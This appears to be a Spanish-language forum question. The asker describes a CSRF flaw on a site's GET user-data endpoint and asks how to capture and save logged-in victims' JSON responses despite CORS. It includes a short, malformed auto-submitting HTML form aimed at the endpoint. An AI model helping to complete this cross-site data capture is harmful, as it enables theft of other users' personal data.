Encontré una vulnerabilidad CSRF en un sitio web. El sitio web está enviando una solicitud GET para obtener datos de usuario y no hay protección. Por lo tanto, al usar HTML, puedo obtener los datos del sitio web si el usuario ha iniciado sesión, pero no puedo guardarlo en mi sitio web.
No puedo usar javascript XHR debido a CORS. Entonces, ¿hay alguna manera de guardar la respuesta json del sitio web vulnerable a través de un formulario HTML en un archivo separado en mi computadora?
Código HTML que solo muestra los datos del usuario:
<html>
<body>
<form id="myform" enctype='text/html' action="https://example.com/v3/user" method="GET"
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>